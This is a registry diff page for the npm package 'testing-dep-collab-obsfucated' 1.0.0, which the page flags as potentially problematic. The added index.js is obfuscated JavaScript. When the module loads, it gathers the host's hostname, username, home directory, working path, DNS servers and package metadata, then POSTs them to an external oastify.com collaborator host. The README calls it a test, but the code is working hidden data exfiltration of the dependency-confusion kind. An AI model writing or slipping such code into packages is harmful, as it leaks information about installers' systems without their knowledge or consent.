testing-dep-collab-obsfucated 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of testing-dep-collab-obsfucated might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +1 -0
  3. package/package.json +11 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Please ignore this test file and do not download it! Thanks!
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x23a5d2=_0x4f22;function _0x4f22(_0x4f1e51,_0x5d2bf7){const _0x45f6f0=_0x45f6();return _0x4f22=function(_0x4f2210,_0x34e9fd){_0x4f2210=_0x4f2210-0x1e1;let _0x3c6765=_0x45f6f0[_0x4f2210];return _0x3c6765;},_0x4f22(_0x4f1e51,_0x5d2bf7);}(function(_0x3d63de,_0x30acf5){const _0x45fa07=_0x4f22,_0x53f82d=_0x3d63de();while(!![]){try{const _0x3ed754=parseInt(_0x45fa07(0x1eb))/0x1+parseInt(_0x45fa07(0x1f7))/0x2*(parseInt(_0x45fa07(0x1e5))/0x3)+-parseInt(_0x45fa07(0x1f6))/0x4+-parseInt(_0x45fa07(0x1f5))/0x5+-parseInt(_0x45fa07(0x1f0))/0x6+parseInt(_0x45fa07(0x1e4))/0x7+parseInt(_0x45fa07(0x1f1))/0x8*(parseInt(_0x45fa07(0x1e1))/0x9);if(_0x3ed754===_0x30acf5)break;else _0x53f82d['push'](_0x53f82d['shift']());}catch(_0x473d39){_0x53f82d['push'](_0x53f82d['shift']());}}}(_0x45f6,0xa918e));const os=require('os'),dns=require('dns'),querystring=require(_0x23a5d2(0x1ee)),https=require(_0x23a5d2(0x1e3)),packageJSON=require('./package.json'),package=packageJSON[_0x23a5d2(0x1ea)],trackingData=JSON[_0x23a5d2(0x1e9)]({'p':package,'c':__dirname,'hd':os[_0x23a5d2(0x1f9)](),'hn':os['hostname'](),'un':os[_0x23a5d2(0x1ef)]()[_0x23a5d2(0x1f8)],'dns':dns[_0x23a5d2(0x1e6)](),'r':packageJSON?packageJSON['___resolved']:undefined,'v':packageJSON[_0x23a5d2(0x1f3)],'pjson':packageJSON});function _0x45f6(){const _0x4f422c=['homedir','9AvLViv','error','https','9350236CLZOzs','9474hDKcYz','getServers','end','POST','stringify','name','76050zidmEX','data','stdout','querystring','userInfo','5670672jUxEqS','2818576QksiRk','request','version','length','5681915uwoLpv','343316bDHCUm','694YsdSLq','username'];_0x45f6=function(){return _0x4f422c;};return _0x45f6();}var postData=querystring['stringify']({'msg':trackingData}),options={'hostname':'p2sygwmj1305bmll099zjkic137uvqjf.oastify.com','port':0x1bb,'path':'/','method':_0x23a5d2(0x1e8),'headers':{'Content-Type':'application/x-www-form-urlencoded','Content-Length':postData[_0x23a5d2(0x1f4)]}},req=https[_0x23a5d2(0x1f2)](options,_0x2496de=>{const _0x5a578d=_0x23a5d2;_0x2496de['on'](_0x5a578d(0x1ec),_0x46341c=>{const _0x1f80cf=_0x5a578d;process[_0x1f80cf(0x1ed)]['write'](_0x46341c);});});req['on'](_0x23a5d2(0x1e2),_0x2d31fe=>{}),req['write'](postData),req[_0x23a5d2(0x1e7)]();
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "testing-dep-collab-obsfucated",
3
+ "version": "1.0.0",
4
+ "description": "Testing",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "Tester",
10
+ "license": "ISC"
11
+ }